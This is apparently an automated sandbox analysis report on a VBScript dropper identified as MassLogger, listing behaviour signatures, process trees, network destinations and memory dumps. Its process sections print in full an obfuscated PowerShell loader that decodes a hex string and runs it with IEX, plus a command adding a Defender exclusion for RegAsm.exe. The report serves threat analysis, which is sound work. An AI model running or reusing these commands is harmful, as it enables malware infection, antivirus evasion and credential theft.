Analysis Overview
SHA256
4c02a2fad0d163c4e3ab8540c7d2bf8c9266424a4cbec17108f0105fc96cd26a
Threat Level: Known bad
The file Document_BT24PDF.vbs was found to be: Known bad.
Malicious Activity Summary
MassLogger
MassLogger Main Payload
Blocklisted process makes network request
Looks up external IP address via web service
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2020-12-13 23:09
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2020-12-13 23:09
Reported
2020-12-13 23:11
Platform
win7v20201028
Max time kernel
37s
Max time network
142s
Command Line
Signatures
MassLogger
MassLogger Main Payload
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | api.ipify.org | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1852 wrote to memory of 1208 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1852 wrote to memory of 1208 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1852 wrote to memory of 1208 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document_BT24PDF.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ILCQg='D4%C7%72%72%02%E6%96%F6%A6%D2%02%37%27%16%86%34%96%96%36%37%16%42%02%D3%76%E6%96%27%47%35%96%96%36%37%16%42%B3%D7%22%F5%42%87%03%22%D5%56%47%97%26%B5%D5%27%16%86%36%B5%B7%02%47%36%56%A6%26%F4%D2%86%36%16%54%27%F6%64%C7%02%92%72%E5%72%82%47%96%C6%07%37%E2%67%D6%42%02%D3%37%27%16%86%34%96%96%36%37%16%42%B3%92%72%76%07%A6%E2%93%65%F2%F6%27%E2%C6%56%46%16%66%16%96%27%56%37%96%47%16%07%F2%F2%A3%37%07%47%47%86%72%C2%46%F6%86%47%56%D4%A3%A3%D5%56%07%97%45%C6%C6%16%34%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%C2%72%76%E6%96%27%47%72%02%B2%02%72%35%46%16%72%02%B2%02%72%F6%C6%E6%72%02%B2%02%72%77%F6%44%72%C2%97%47%47%42%82%56%D6%16%E6%97%24%C6%C6%16%34%A3%A3%D5%E6%F6%96%47%36%16%27%56%47%E6%94%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%02%D3%67%D6%42%B3%92%72%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%72%82%56%D6%16%E4%C6%16%96%47%27%16%05%86%47%96%75%46%16%F6%C4%A3%A3%D5%97%C6%26%D6%56%37%37%14%E2%E6%F6%96%47%36%56%C6%66%56%25%E2%D6%56%47%37%97%35%B5%02%D5%46%96%F6%67%B5%B3%D4%C7%72%92%47%E6%56%72%B2%72%96%C6%34%26%72%B2%72%56%75%E2%47%72%B2%72%56%E4%02%47%36%72%B2%72%56%A6%26%F4%72%B2%72%D2%77%56%E4%82%72%D3%97%47%47%42%B3%23%23%07%42%02%D3%02%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%A3%A3%D5%27%56%76%16%E6%16%D4%47%E6%96%F6%05%56%36%96%67%27%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%B3%92%23%73%03%33%02%C2%D5%56%07%97%45%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%82%47%36%56%A6%26%F4%F6%45%A3%A3%D5%D6%57%E6%54%B5%02%D3%02%23%23%07%42%B3%92%76%E6%96%07%42%82%02%C6%96%47%E6%57%02%D7%47%56%96%57%15%D2%02%13%02%47%E6%57%F6%36%D2%02%D6%F6%36%E2%56%C6%76%F6%F6%76%02%07%D6%F6%36%D2%02%E6%F6%96%47%36%56%E6%E6%F6%36%D2%47%37%56%47%02%D3%02%76%E6%96%07%42%B7%02%F6%46%B3%56%E6%F6%26%45%42%02%D4%02%C6%16%37%B3%92%72%94%72%C2%72%E3%72%82%56%36%16%C6%07%56%27%E2%72%85%54%E3%72%D3%56%E6%F6%26%45%42';$text =$ILCQg.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 8.8.8.8:53 | patiseriafadel.ro | udp |
| N/A | 95.214.135.27:443 | patiseriafadel.ro | tcp |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 23.21.42.25:80 | api.ipify.org | tcp |
Files
memory/1208-2-0x0000000000000000-mapping.dmp
memory/1852-3-0x0000000002570000-0x0000000002574000-memory.dmp
memory/1208-4-0x000007FEF5910000-0x000007FEF62FC000-memory.dmp
memory/1208-5-0x0000000002480000-0x0000000002481000-memory.dmp
memory/1208-6-0x000000001ABA0000-0x000000001ABA1000-memory.dmp
memory/1208-7-0x00000000024C0000-0x00000000024C1000-memory.dmp
memory/1208-8-0x00000000023E0000-0x00000000023E1000-memory.dmp
memory/1208-9-0x000000001C120000-0x000000001C121000-memory.dmp
memory/1208-10-0x000000001AA90000-0x000000001AA91000-memory.dmp
memory/1208-11-0x000000001B6B0000-0x000000001B6C7000-memory.dmp
memory/1208-12-0x0000000002390000-0x0000000002397000-memory.dmp
memory/1208-13-0x0000000002370000-0x000000000237D000-memory.dmp
memory/784-15-0x00000000004819EE-mapping.dmp
memory/784-14-0x0000000000400000-0x0000000000486000-memory.dmp
memory/784-16-0x0000000000400000-0x0000000000486000-memory.dmp
memory/784-17-0x0000000000400000-0x0000000000486000-memory.dmp
memory/784-18-0x0000000073510000-0x0000000073BFE000-memory.dmp
memory/1068-21-0x0000000000000000-mapping.dmp
memory/1068-23-0x0000000000D10000-0x0000000000D11000-memory.dmp
memory/1068-22-0x0000000073510000-0x0000000073BFE000-memory.dmp
memory/1068-24-0x0000000004AB0000-0x0000000004AB1000-memory.dmp
memory/1068-25-0x0000000001290000-0x0000000001291000-memory.dmp
memory/1068-26-0x0000000004950000-0x0000000004951000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 496860d2ea0838a75eb39e21a3e27af1 |
| SHA1 | fe2bd7439889fb4502403f6c6ac3fa512db78a18 |
| SHA256 | e020187f6f137b2d886851835a257b04eb36746c007ede4d1e0f1458c21aeebc |
| SHA512 | e12f33f8f5d5f7ce9e8d0c38a92a3602a4530c52ce5fa1fefb7b7c959dd411acdb0c16e33307a20cb3449ee7f496aefe03d97f06b0a053d6fb9c4554cdb5c04b |
memory/1068-30-0x0000000005FC0000-0x0000000005FC1000-memory.dmp
memory/1068-35-0x0000000006030000-0x0000000006031000-memory.dmp
memory/1068-36-0x0000000006100000-0x0000000006101000-memory.dmp
memory/1068-43-0x0000000006280000-0x0000000006281000-memory.dmp
memory/1068-44-0x0000000005F80000-0x0000000005F81000-memory.dmp
memory/1068-59-0x0000000006310000-0x0000000006311000-memory.dmp
memory/1068-58-0x0000000006300000-0x0000000006301000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2020-12-13 23:09
Reported
2020-12-13 23:11
Platform
win10v20201028
Max time kernel
14s
Max time network
138s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 1400 wrote to memory of 3340 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1400 wrote to memory of 3340 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Document_BT24PDF.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ILCQg='D4%C7%72%72%02%E6%96%F6%A6%D2%02%37%27%16%86%34%96%96%36%37%16%42%02%D3%76%E6%96%27%47%35%96%96%36%37%16%42%B3%D7%22%F5%42%87%03%22%D5%56%47%97%26%B5%D5%27%16%86%36%B5%B7%02%47%36%56%A6%26%F4%D2%86%36%16%54%27%F6%64%C7%02%92%72%E5%72%82%47%96%C6%07%37%E2%67%D6%42%02%D3%37%27%16%86%34%96%96%36%37%16%42%B3%92%72%76%07%A6%E2%93%65%F2%F6%27%E2%C6%56%46%16%66%16%96%27%56%37%96%47%16%07%F2%F2%A3%37%07%47%47%86%72%C2%46%F6%86%47%56%D4%A3%A3%D5%56%07%97%45%C6%C6%16%34%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%C2%72%76%E6%96%27%47%72%02%B2%02%72%35%46%16%72%02%B2%02%72%F6%C6%E6%72%02%B2%02%72%77%F6%44%72%C2%97%47%47%42%82%56%D6%16%E6%97%24%C6%C6%16%34%A3%A3%D5%E6%F6%96%47%36%16%27%56%47%E6%94%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%02%D3%67%D6%42%B3%92%72%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%72%82%56%D6%16%E4%C6%16%96%47%27%16%05%86%47%96%75%46%16%F6%C4%A3%A3%D5%97%C6%26%D6%56%37%37%14%E2%E6%F6%96%47%36%56%C6%66%56%25%E2%D6%56%47%37%97%35%B5%02%D5%46%96%F6%67%B5%B3%D4%C7%72%92%47%E6%56%72%B2%72%96%C6%34%26%72%B2%72%56%75%E2%47%72%B2%72%56%E4%02%47%36%72%B2%72%56%A6%26%F4%72%B2%72%D2%77%56%E4%82%72%D3%97%47%47%42%B3%23%23%07%42%02%D3%02%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%A3%A3%D5%27%56%76%16%E6%16%D4%47%E6%96%F6%05%56%36%96%67%27%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%B3%92%23%73%03%33%02%C2%D5%56%07%97%45%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%82%47%36%56%A6%26%F4%F6%45%A3%A3%D5%D6%57%E6%54%B5%02%D3%02%23%23%07%42%B3%92%76%E6%96%07%42%82%02%C6%96%47%E6%57%02%D7%47%56%96%57%15%D2%02%13%02%47%E6%57%F6%36%D2%02%D6%F6%36%E2%56%C6%76%F6%F6%76%02%07%D6%F6%36%D2%02%E6%F6%96%47%36%56%E6%E6%F6%36%D2%47%37%56%47%02%D3%02%76%E6%96%07%42%B7%02%F6%46%B3%56%E6%F6%26%45%42%02%D4%02%C6%16%37%B3%92%72%94%72%C2%72%E3%72%82%56%36%16%C6%07%56%27%E2%72%85%54%E3%72%D3%56%E6%F6%26%45%42';$text =$ILCQg.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| N/A | 8.8.8.8:53 | google.com | udp |
| N/A | 8.8.8.8:53 | patiseriafadel.ro | udp |
| N/A | 95.214.135.27:443 | patiseriafadel.ro | tcp |
Files
memory/3340-2-0x0000000000000000-mapping.dmp
memory/3340-3-0x00007FFB59970000-0x00007FFB5A35C000-memory.dmp
memory/3340-4-0x000002B46A670000-0x000002B46A671000-memory.dmp
memory/3340-5-0x000002B46A820000-0x000002B46A821000-memory.dmp